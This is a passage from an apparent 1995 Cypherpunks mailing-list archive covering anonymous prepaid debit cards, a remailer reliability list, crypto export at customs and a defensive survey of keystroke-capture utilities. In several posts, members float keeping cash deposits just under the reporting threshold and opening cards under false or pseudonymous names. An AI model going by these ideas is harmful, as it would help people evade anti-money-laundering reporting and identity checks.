Sure.....Canada right now has a fully operational debit card system in place. You go to a supplier to make a purchase and they run your bank card through a machine just like your credit card for the purchase. Difference being, $$$ from your chequing account are debited, as opposed to the line of credit on your credit card being debited. You have dollars in the bank sufficient for the purchase, then no problem.

> If this is a gray area, why wouldn't this scheme work?

It's a perfectly workable scheme....IF...the BANK in question is trusted as the medium of exchange. That's the ONLY thing stopping its implementation, namely having a trusted institution to handle the deposits/transfers.
Let's put it this way, I think the scheme would have A LOT more acceptance if you as a seller presented your invoice for settlement at Chase Manhattan or Bank of Montreal as opposed to the Cypherpunk Bank :>.

> If this scheme was set up, it appears to me that the infrastructure for
> anonymous payments/netcash is already in place. Of course the issuer would

Sure it is....co-ordinating the infrastructure would be interesting, but doable. The main thing is....is it economically viable for the institution in question? Would there be enough commerce done over the 'Net to justify implementation of the supporting infrastructure (ie Internet hook-ups, training of staff, etc).

Once there exists a demand for the service, coupled with a reasonable rate of return to the Bank for provision of the service, then you'll see ALL the top 20 banks in the world do it. Until then, nobody will do it simply because the Cypherpunks think it is a good idea. :>

--------------------------------------------------------------------------
Mark Terka     | werewolf at io.org             | public key (werewolf) by
Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------

From skaplin at skypoint.com Mon Jan 2 02:17:01 1995
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 02:17:01 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> > Let's suppose myself and 10,000 of my closest friends form the First
> > National Cypherpunk Bank and Trust. We go through all of the hassles in
> > order to be the issuer of a Master Card or Visa. Now instead of having a
> > credit line, it is set up as a debit card. The card's limit is how ever
>
>
> Why jump through the hoops Visa or M/C would send you through if it's a DEBIT
> card???
> You don't need them for something like that, simply the
> acceptance of the Internet community, that credits from another user
> drawn on the Cypherpunk Bank would be accepted.....which leads to your next
> paragraph...

I was looking at the bigger picture. Any merchant who accepts Visa or MC could now accept anonymous payments. No hassle at all on their part. They probably wouldn't even know that it was an anonymous account. It fits into the existing infrastructure very nicely.

A bank in Minneapolis has a similar system in operation. They issue you a Visa card. That card automatically debits your checking account. The key would be not to have the card attached to the account. If the card is attached to any type of account, then there are reporting requirements.

A more apt analogy would be the prepaid phone cards. Walk into the issuing authority, plunk your $9999.99 on the counter and ask for your card. When you've spent it all, toss the card.

Sam

==============================================================================
Marriage is like a cage; one sees the birds outside desperate to get in, and those inside equally desperate to get out.
        - Michel Eyquem de Montaigne
==============================================================================
skaplin at skypoint.com                  | Finger skaplin at infinity.c2.org for
                                        | a listing of crypto related files
PGP encrypted mail is accepted and      | available on my auto-responder.
preferred.                              | (Yes...the faqs are there!)
                                        |
E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com   | outside a Roman brothel.
==============================================================================

From eric at remailer.net Mon Jan 2 05:45:01 1995
From: eric at remailer.net (Eric Hughes)
Date: Mon, 2 Jan 95 05:45:01 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID: <199501021344.FAA11566@largo.remailer.net>

   From: skaplin at skypoint.com (Samuel Kaplin)

   I was looking at the bigger picture. Any merchant who accepts Visa or MC could now accept anonymous payments. No hassle at all on their part.
   [...]
   The key would be not to have the card attached to the account. If the card is attached to any type of account, then there are reporting requirements.

Visa was talking about an electronic traveller's check, which, from what I could tell, instantiated an account in the sum of the value of the card purchased, which was then drawn down by purchase.

The card, evidently, had no embossing on it. Personalization was limited to some account id which would last the lifetime of the balance and then disappear.

Eric

From sommerfeld at orchard.medford.ma.us Mon Jan 2 06:36:02 1995
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Mon, 2 Jan 95 06:36:02 PST
Subject: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID: <199501021422.JAA00361@orchard.medford.ma.us>

-----BEGIN PGP SIGNED MESSAGE-----

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules.
>
> I can think of a at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July. I suspect there are more. Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material. Should drive the Customs guys
> completely nuts.

Actually, those of us who are going should arrange to take *separate* flights...

My reading of Matt's message said that most of the time was spent trying to figure out what to do, and only a little time was spent actually doing it. If a bunch of people all take the same flight, it will take them only a slight bit longer to process the whole bunch of you than if one person on the flight was doing it...

- Bill

From raph at CS.Berkeley.EDU Mon Jan 2 06:49:15 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 2 Jan 95 06:49:15 PST
Subject: List of reliable remailers
Message-ID: <199501021450.GAA02030@kiwi.CS.Berkeley.EDU>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers.
The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
$remailer{"q"} = " cpunk hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 2 Jan 95 6:00:02 PST

remailer  email address                     history       latency   uptime
-----------------------------------------------------------------------
nately    remailer at nately.ucsd.edu        +++++++++++*     32:53   99.99%
mix       mixmaster at nately.ucsd.edu       +++++++++-+      41:39   99.99%
rahul     homer at rahul.net                 --***#***#**      9:40   99.98%
penet     anon at anon.penet.fi              ********+***     26:09   99.99%
vox       remail at vox.xs4all.nl            .-..-------   12:53:05   99.99%
soda      remailer at csua.berkeley.edu      .-.._-.-..     8:50:49   99.67%
usura     usura at replay.com                *****+- -- *     22:53   99.33%
flame     tomaz at flame.sinet.org           ** *-*-*-**      32:52   99.09%
jpunix    remailer at jpunix.com             ** *-#-*-**      32:26   99.06%
c2        remail at c2.org                   --__.-+*--**   2:50:57   98.95%
rebma     remailer at rebma.mn.org           ---*----*      7:52:32   99.27%
ideath    remailer at ideath.goldenbear.com  ++* ++** -     2:09:26   98.05%
bsu-cs    nowhere at bsu-cs.bsu.edu          +* --#+##**    1:40:45   96.01%
q         q at c2.org                        --_ . --+      6:03:15   92.56%
alumni    hal at alumni.caltech.edu          *****#*++ *-     27:00   89.60%
portal    hfinney at shell.portal.com        #*#**#*** *-     21:31   89.60%
extropia  remail at extropia.wimsey.com      +.-+* +++     12:38:44   77.66%
xs4all    remailer at xs4all.nl              *** *--          20:22   75.57%
desert    remail at desert.xs4all.nl         ----____.--   40:43:30   71.96%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key

* #  response in less than 5 minutes.
* *  response in less than 1 hour.
* +  response in less than 4 hours.
* -  response in less than 24 hours.
* .  response in more than 1 day.
* _  response came back too late (more than 2 days).

Options and features

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp   Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
special  Accepts only pgp encrypted messages.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From pcassidy at world.std.com Mon Jan 2 07:27:25 1995
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Mon, 2 Jan 95 07:27:25 PST
Subject: exponential relationship of crytographer and cryptanalyst
Message-ID:

- I'm writing a piece on the politics of surveillance/privacy technologies for OMNI, essentially a survey of their advance since the 1967 proposal for the National Data Center. I cover cryptography, deriving the narrative from Clipper Chip initiative. The point I'm trying to make is that given the market forces pushing commerce onto the public networks and the increasing power of available encryption, the cold war national apparatus will have to mobilize quickly a la digital telephony to stomp it - yet the nature of computing puts them in a losing position in the long run.

Toward the latter part of this thesis, I've been told - and want to check with youz - of the exponential relationship of cryptographer and cryptanalyst. The heart of this relationship has been explained to me as follows: Increasing the key by one bit effectively doubles the number of keys and proportionally increases the power required to break it in a brute force attack. Is this true? Is there a truer way of stating it? Are there complicating factors this excludes that I should discuss?

- Regards,

- Peter Cassidy

From jrt at asiaonline.net Mon Jan 2 08:58:31 1995
From: jrt at asiaonline.net (jRT)
Date: Mon, 2 Jan 95 08:58:31 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID:

Well, I know some shops have so called 'switch' or 'smart' cards to debit your account, some of these are on their own credit line, others are not.

I have an account with a bank in Britain which gives me a "VISA" Card which is actually a 'direct-debit' card.
I can use it (and have) all around the world as a regular VISA card and in any 'VISA compatible' ATM.

As soon as my balance drops to zero, I can no longer use it. And when I do, the money jumps out of my account immediately and can no longer be used.

This is a bank-issued card, and also acts as my ATM card to access my current account - there is NO charge for this. I'm not sure exactly how that works.

Whether or not VISA would accept a proposal from First National Cyberphunks or not remains to be seen...

------------------------------------------------------------------------------
jrt at AsiaOnline.Net   john at AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.
Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever
> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:

From nobody at rahul.net Mon Jan 2 09:25:20 1995
From: nobody at rahul.net (nobody at rahul.net)
Date: Mon, 2 Jan 95 09:25:20 PST
Subject: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501021725.AA09061@bolero.rahul.net>

Matt has a good story, and the lesson that he draws, that presently the average person can't follow the rules, seems valid.

But I don't see the point of the proposals to replicate his experiment. Doesn't Matt's experience really show simply that not enough people try to follow the rules, so the agencies aren't set up yet to make it easy?
Is it our goal to change this, to get Customs to streamline their operation so that everyone really does register their crypto equipment on travels overseas? It seems to me we are better off with the present informal system where you can actually use crypto overseas without worrying much.

I could see a system where you routinely fill out and have your card stamped when you check your luggage to show that you are carrying crypto. Then you turn it in when you come back. This might not be too different from what you do now when you declare items you are taking out and bringing back to show they are free of customs duties. How does this advance the CP cause?

From jya at pipeline.com Mon Jan 2 10:26:08 1995
From: jya at pipeline.com (John Young)
Date: Mon, 2 Jan 95 10:26:08 PST
Subject: (Fwd) Re Anonymous posting
Message-ID: <199501021826.NAA11086@pipe2.pipeline.com>

For those interested in the anonymity issue there is a lively debate on list Cyberia-L (a legal list) which was stimulated, in part, by Peter Lewis's articles on anonymity and the LaMacchia case dismissal.

For participation send message to:

listserv at listserv.cc.wm.edu

subscribe cyberia-l Your name

Provocatively, I forward the following:

Forwarding mail by: jsilverm at reach.com (Jared Silverman -- NJ Bureau of Sec. - Newark) on Mon, 2 Jan 11:58 AM
-------------------

On January 1, 1995, Buford Terrell wrote:

>Anonymity is very much a core 1st Amendment value and at the
>center of both political speech and the right to assemble.

[Snip]

>Often times, the only way weak or unpopular minorities can speak
>is anonymously. There have been many times when to couple one's
>name to one's writings would be to invite martyrdom. I had
>rather risk a few perverts than to stifle this most important
>channel for dissent.

It is one thing to claim First Amendment protection to shield political speech, IMHO it is another to shield fraud and criminal behavior.
Besides the First Amendment runs against the government, not in favor of individuals in actions brought by private parties. In the sexism thread, would anyone claim that an individual has the right to harass or stalk a person under the guise of the First Amendment? Would the First Amendment be a defense in a defamation suit? Of course not (Times v. Sullivan aside). Doesn't an individual have the right to know the identity of someone who is trying to communicate with him/her on a private basis? To a certain extent, the question was crystallized in the caller ID debate -- Who has the superior right, the calling party to anonymity or the called party to knowing who is calling?

One of the areas of my professional concern is the use of cyberspace for securities fraud and manipulation. Cyberspace is an ideal medium for these activities because of the availability of anonymity and pseudonymity. Even on commercial BBSs, where "member lists" are available, posting to these lists is voluntary and those who draw my attention are rarely on these lists. Does all of cyberspace become off limits to conventional private rights and law enforcement under the rubric of "freedom of speech and assembly?"

|--------------------------------------------------------------|
|A. Jared Silverman, Chief-New Jersey Bureau of Securities     |
|jsilverm at reach.com | 201-504-3600 (phone) | 201-504-3601 (fax)|
|**************************************************************|
| My purpose holds to sail beyond the sunset - Tennyson        |
|**************************************************************|
|The foregoing is the personal opinion of the sender and is not|
|the official position of either the Bureau of Securities or   |
|the New Jersey Attorney General and the Department of Law and |
|Public Safety. Affiliation given for identification only.     |
|--------------------------------------------------------------|

From shamrock at netcom.com Mon Jan 2 11:03:09 1995
From: shamrock at netcom.com (Lucky Green)
Date: Mon, 2 Jan 95 11:03:09 PST
Subject: Anonymous payment scheme
Message-ID:

Samuel Kaplin wrote:

>Let's suppose myself and 10,000 of my closest friends form the First
>National Cypherpunk Bank and Trust. We go through all of the hassles in
>order to be the issuer of a Master Card or Visa. Now instead of having a
>credit line, it is set up as a debit card. The card's limit is how ever
>much you have prepaid the bank in advance. Once you have hit your prepaid
>amount the card no longer gets approved. Now because everything is prepaid,
>there is no risk to me, so I'll put any name you want on the card. The
>questions I have are:
>
>Is this legal in the U.S.?
>
>If so, is anyone doing it?

This type of card is issued with just about every checking account in Oregon. I don't know about other states, except that here in California I know of only two that are doing it: Charles Schwab and Glendale Federal. There may be more, but I have yet to hear about them. In Oregon you get such an ATM/Visa card instead of your regular ATM card. Good credit, bad credit, no credit. Now if I could just remember what it's called...

-- Lucky Green
PGP encrypted mail preferred.

From blane at seanet.com Mon Jan 2 12:17:47 1995
From: blane at seanet.com (Brian Lane)
Date: Mon, 2 Jan 95 12:17:47 PST
Subject: Anonymous payment scheme
In-Reply-To:
Message-ID:

On Tue, 3 Jan 1995, jRT wrote:

>
> Well, I know some shops have so called 'switch' or 'smart' cards to debit
> your account, some of these are on their own credit line, others are not.
>
> I have an account with a bank in Britain which gives me a "VISA" Card
> which is actually a 'direct-debit' card. I can use it (and have) all
> around the world as a regular VISA card and in any 'VISA compatible' ATM.
A lot of the banks in the US are now offering these cards for use with checking accounts.

>
> As soon as my balance drops to zero, I can no longer use it. And when I
> do, the money jumps out of my account immediately and can no longer be used.
>
> This is a bank-issued card, and also acts as my ATM card to access my
> current account - there is NO charge for this. I'm not sure exactly how
> that works.

When a charge is made to the card it is subtracted from the balance until midnight? of that night. If the actual charge does not come in to the bank, the amount is then added back to the balance. (This was learned thru my GF who had some trouble with her card -- forgot to write down a couple of transactions and ended up at zero).

>
> Whether or not VISA would accept a proposal from First National
> Cyberphunks or not remains to be seen...

I think they should. If they would is another matter. It would be similar to having a 'secret' Swiss bank account that can be accessed from anywhere in the world, converted to cash at cash machines, transferred to others, etc.

I like the idea of an anonymous Visa better than some sort of new net-bank because it is already established, the mechanism for transfer is already in place, and for the most part de-bugged.

If there was an Anonymous Visa debit card I'd definitely go for it. It would certainly keep those marketing types from tracking my spending patterns.

Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key." | finger blane at seanet.com
        -- Journey                              | PGP 2.6 email accepted
------------------------------------------------------------------------------

From pstemari at erinet.com Mon Jan 2 12:38:34 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Mon, 2 Jan 95 12:38:34 PST
Subject: Anonymous payment scheme
Message-ID: <9501022030.AA03421@eri.erinet.com>

At 03:52 AM 1/2/95 -0600, Samuel Kaplin wrote:

>...
>I was looking at the bigger picture. Any merchant who accepts Visa or MC
>could now accept anonymous payments. No hassle at all on their part. They
>probably wouldn't even know that it was an anonymous account. It fits into
>the existing infrastructure very nicely.

If you can convince BankAmerica or MasterCard International to deal with you.

> ... Walk into the issuing authority, plunk your $9999.99 on the counter and
> ask for your card. When you've spent it all, toss the card.

Right there you imply one of the requirements you'd need to fulfill--the reporting requirements on cash transactions over $10K. If you accepted many deposits over $5K, you probably get asked a lot of questions about how you're preventing people from structuring transactions to avoid the reporting requirement.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From entropy at IntNet.net Mon Jan 2 13:00:10 1995
From: entropy at IntNet.net (Jonathan Cooper)
Date: Mon, 2 Jan 95 13:00:10 PST
Subject: Regarding anonymous debit cards..
In-Reply-To:
Message-ID:

> A lot of the banks in the US are now offering these cards for use with
> checking accounts.

Yes. There are also the ``secured'' credit cards where one deposits X dollars into the issuing bank and is allowed 1.5 * X in credit. Many of these will promote to ``real'' credit cards after a year or some specific amount of charging that's been paid back on time (usually about $1000).

These are a godsend for those who've gone bankrupt; as such I wouldn't be terribly surprised if the issuers didn't even bother to do a credit check until the card promotes, if at all.

If this is the case, what's to stop someone from filling out the application under a pseudonymous identity with a mail drop as the contact address?

> I think they should. If they would is another matter.
> It would be
> similar to having a 'secret' Swiss bank account that can be accessed from
> anywhere in the world, converted to cash at cash machines, transferred to
> others, etc.

It's a great idea - at last year's Siggraph convention I needed to stay in contact with an associate 24 hours a day if need be. I discovered that in the Kinko's in the Orange County Convention Center there's a cellular phone rental machine, but it took credit cards and the people at the desk wouldn't let me rent one without one - even though I offered to leave my ID and a sizable deposit.

I'm technically not old enough to get a credit card, and regardless of that fact when I spoke to someone at Barnett Bank about getting one and listed my occupation as 'Consultant' she laughed in my face.

Solution: I got a secured card from a bank in Vermont. They have $500 of my money in an account, and I have a card with a $500 limit in my father's name.

> If there was an Anonymous Visa debit card I'd definitely go for it. It
> would certainly keep those marketing types from tracking my spending
> patterns.

Without a doubt. I wonder, again, if the issuing bank even _cares_ who you are if you get one of these secured cards.

There was discussion here about debit/secured cards some time ago - anyone remember the upshot of the discussion?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )

From KEY-CAPTURE at lsd.com Mon Jan 2 13:00:53 1995
From: KEY-CAPTURE at lsd.com (Dave Del Torto)
Date: Mon, 2 Jan 95 13:00:53 PST
Subject: RFC: Key Capture Utility Survey
Message-ID:

REQUEST FOR COMMENTS ON KEY CAPTURE UTILITIES
---------------------------------------------

Key capture utilities present a serious threat to the security of passwords on individual and networked computing systems, especially when novice users are unaware of their presence. Well-educated users and administrators help make all systems on and off the Internet more reliably safe for everyone's data.

If you are a:

-- privacy, system security or cryptography advocate/activist
-- network admin concerned with the password-hygiene of your users or
-- computing professional with an appreciation of good security,

then please complete and return this quick survey. By contributing to the knowledgebase on the subject of password protection, you can help educate yourself and many novice/intermediate users about a common weakness -- utilities that may capture their keystrokes unseen as they enter their *password* -- in ALL secured systems (a user's encryption app, your network or its dial-in access, your company's email system or database fileserver, etc.).

The intent here is to create a *central list of all key-capture utilities* which will help people to at least be aware of their existence or operation on a given system and describe in simple terms how to disable the utility.

The results of the survey will be tabulated and put in the public domain on the Internet.
If your reply is included, your name will be acknowledged in the resulting document, which will be: part of the new "Beginner's PGP FAQ" for new users of the PGP (Pretty Good Privacy) application; a msg posted on various Internet lists and online services and; a text file available by anonymous FTP as: ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/key_cap_util.txt Please forward this survey to anyone you think can/will help - and thanks in advance for your contribution! _______________________________ THE KEY CAPTURE UTILITY SURVEY: The survey is very easy to participate in. Just send as much information as you can, even if you're only partially able to complete the form. Every piece of information that can lead us to the utility - even just a fragment of a name and an email address of someone who might know more about it - will help us compile a fairly exhaustive list. To assist us in easily tabulating the incoming mail on this topic, please send your reply to: - - - - Format your answer as follows: ******* PLEASE RETURN ONLY THIS INFORMATION ******* TO: KEY-CAPTURE at lsd.com SUBJ: PLATFORM/Utility Name MSG BODY: [1] OPERATING-SYS <--- i.e. WIN/DOS/MAC/OS2/UNIX, etc. [2] "Utility-Name" (utility-package-name, if not a stand-alone product) [3] Developer-Name (company-individual) [4] [5] Type <--- i.e.: system extension, autoexec, TSR [6] Path-to-file-location-when-loaded. [7] How to disable the utility's key capturing operations (step-by-step if possible). Please be brief, but aim for a novice level user. If disabling the key capturing is too complex to describe easily, then just explain what the user should ask a sys admin to do for them (while they watch, if applicable). *************************************************** (Here's an Example:) SUBJ: MAC/Now Save MSG BODY: [1] MAC [2] "Now Save" (Now Utilities v5.x), "NowSave" (Now Utilities v4.x) [3] Now Software, Inc. 
[4] [5] System extension/Control Panel device (CDEV) [6] [startup HD]:System Folder:Control Panels:Now Save (or :NowSave) [7] How to Disable: Open the "NowSave" (v4.x) or "Now Save" (v5.x) Control Panel. v4.x: Click the "Preferences" button. Click the "Key Capture..." button. Click the "OFF" radio button (upper right corner of dialog). Click the "OK" button. v5.0: Click the "Key Capture..." button in the button-bar. Click the "OFF" radio button (in upper right corner of dialog). Click the "OK" button. From tcmay at netcom.com Mon Jan 2 13:04:22 1995 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 2 Jan 95 13:04:22 PST Subject: Reminder: January 14th "Tools Demo Day" Meeting Message-ID: <199501022104.NAA01913@netcom19.netcom.com> This is a reminder that the January 14th "Tools Demo Day" meeting is coming up, standard place and time at the Silicon Graphics building in Mountain View, CA. I described this several weeks back and asked for folks interested in demonstrating any sort of software tools, crypto code, languages, etc., to get in contact with me. One person, Henry Strickland (Strick), has done so. In any case, the meeting will go on. I'll have my PowerMac 7100 there, and will demo some things like Mathematica, SmalltalkAgents, MacPGP, etc. An SGI Unix box is of course available. An Intel box running something of interest will presumably be brought by someone. Anyone planning to demo something should either plan to run on a machine they know will be there, or bring their own. A video projector is sometimes usable, and I plan to bring my video camera. The idea is that laptops and other non-video out systems can still be seen by lots of folks. (Someone mentioned also that an LCD projector may be available.) The normal meeting time is 12-5, but people usually spend the first hour shmoozing and eating their burritos, so I plan on starting the formal meeting at 1 (but don't get there at 1 and _then_ expect to shmooze/eat for the next hour!). 
The machines should be ready to go by 1:30 at the latest, so that demos can begin. If we have a lot of demos--not likely based on current information--then I'll propose parallel tracks. Please don't be bashful about doing a demo! The idea is to educate and expose people to tools and software they might otherwise only vaguely know about. Demos don't have to be polished and professional. And please send me a brief note if you want to demo something. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hfinney at shell.portal.com Mon Jan 2 13:20:50 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 2 Jan 95 13:20:50 PST Subject: Anonymous payment scheme Message-ID: <199501022121.NAA07411@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- There are a couple of issues here. One is whether you could get a debit card with another name printed on it than your own. Sandy Sandfort and some others have suggested here that this would be legal and possible already as long as you don't do it with the intention to commit fraud. You can open a secured account by mail and give a false name. I'm not sure what you do in this situation if they ask to see some ID when you try to use the card. This would be rather embarrassing, it seems to me. Sorry, I guess I left my drivers license in my other pants... Or, never mind, try this card. That other one was from before I changed my name...
The other issue is whether you could set up a payment system which did not require social security numbers from the participants. I think this is much more questionable. Although the phone cards and some other restricted usage systems are apparently legal, bank accounts seem to have many more restrictions. Barter and scrip systems are also heavily regulated. All these laws involving reporting requirements, etc., were passed to help the government track the flow of money. There is no way the government is going to make an exception at this point. In fact, I suspect that if the limited systems expanded to where they were used for general payments, the government would crack down. I recall reading that just such a crackdown occurred in Las Vegas when casino chips started to be accepted for non-gambling payments. So, you may be able to have a form of anonymity from the person you are transacting with, but I don't think you can be anonymous from the bank and from the government. And personally, I am more concerned about the bank and gov't tracking my spending patterns than whether the guy I buy gas from knowing my name. The bank has a lot more information about me which is much more threatening to my privacy. A nom de guerre VISA or debit card does not seem to help this problem. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A== =CF5G -----END PGP SIGNATURE----- From jcorgan at scruznet.com Mon Jan 2 13:43:20 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Mon, 2 Jan 95 13:43:20 PST Subject: Reminder: January 14th "Tools Demo Day" Meeting Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Some may recall an idea I wrote about a couple weeks ago to provide transparent encryption/signing/remailing facilities to users of Windows Sockets based mail agents on PC's (e.g., Eudora).
I have completed an initial portion of the program as a "proof of concept." All it does right now is act as a SMTP server and accepts mail from a mail agent, performs requested encryption/signing operations on received messages, and puts RFC 822 compliant outbound messages in a directory for submission to a 'real' SMTP server. (No remailing features present). Of course, the next module to write is the SMTP client that takes this outbound message queue and sends it off to the actual SMTP server. It is a bare bones app with no user interface, fault tolerance, or configuration options, and probably only works on my machine at the moment :) I don't expect to make any significant progress on the program between now and the Jan. 14 meeting, but if anyone is interested I will bring it to the meeting and "demo" what little there is at the moment. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov WWW: ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.html From dave.hodgins at canrem.com Mon Jan 2 13:58:58 1995 From: dave.hodgins at canrem.com (Dave Hodgins) Date: Mon, 2 Jan 95 13:58:58 PST Subject: key servers list Message-ID: <60.18197.6525.0C1C6B79@canrem.com> -----BEGIN PGP SIGNED MESSAGE----- Does anyone have an up-to-date list of pgp keyservers available? Is there a fingerable keyserver, like wasabi at io.com used to be? Thanks in advance, Dave Hodgins.
**EZ-PGP v1.07 --- * RM 1.3 00820 * Internet:Dave.Hodgins at Canrem.com Rime->118 Fido(1:229/15) From abostick at netcom.com Mon Jan 2 14:53:46 1995 From: abostick at netcom.com (Alan Bostick) Date: Mon, 2 Jan 95 14:53:46 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article , you wrote: > Right now, I don't think U.S. Customs is going to ask you if you > have PGP in your PC if you leave the country, or return either. > > They should, and I'd be proud to say yes. And you can beam with pride as they impound your PC and take it away. Gosh. Sometimes it's just swell to be a cypherpunk. Kinda chokes me up. . . . Right now the situation is a sort of security-through-obscurity situation where they're not going to bother you for having PGP on your laptop's hard disk. Security through obscurity sucks, but the present situation is still better than the one where they know what to look for and what questions to ask, and you're headed for the slammer if you haven't gotten your temporary export license signed and stamped and ready to go. Do you want it to be easier to comply with bad law? | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible.
finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLwh5U+VevBgtmhnpAQGWywMAhEpmFRrQXJPRpF4mPqAHmaxcGpZm00z2 acEogITT4O+aT+qGOoAiUnlaRWXOLmkOle75dhoAiJOabzRJ09rwXfyZzVLna8Gd DI9fVCrIjodY3Xl6BLZfRjblmDIQT6LA =RzSg -----END PGP SIGNATURE----- From crawford at scruznet.com Mon Jan 2 15:37:03 1995 From: crawford at scruznet.com (Michael D. Crawford) Date: Mon, 2 Jan 95 15:37:03 PST Subject: Comments on Key Capture Survey Message-ID: <199501022337.PAA05279@scruz.net> I am the author of the Last Resort keystroke capture program for the Macintosh, published by Working Software, Inc.. I am writing up the surveys for LR for Mac, DOS and Windows and will send them shortly. I have a couple of comments, which the list might be interested in hearing. Your entries for the Macintosh should record the file type and creator code, which are, for Last Resort, 'cdev' and 'mIKE' respectively (case is significant). If someone were to write an automated scanner meant to protect a disk against such utilities, it would be much more reliable if it looked for the creator codes, as Mac programs are usually written to not depend on having a particular file name. These codes live in the file system, but are not part of the name space as '.EXE' would be on DOS. You can view them with ResEdit's "Get File/Folder Info" item from the File menu. We spent a lot of time pondering the problem of 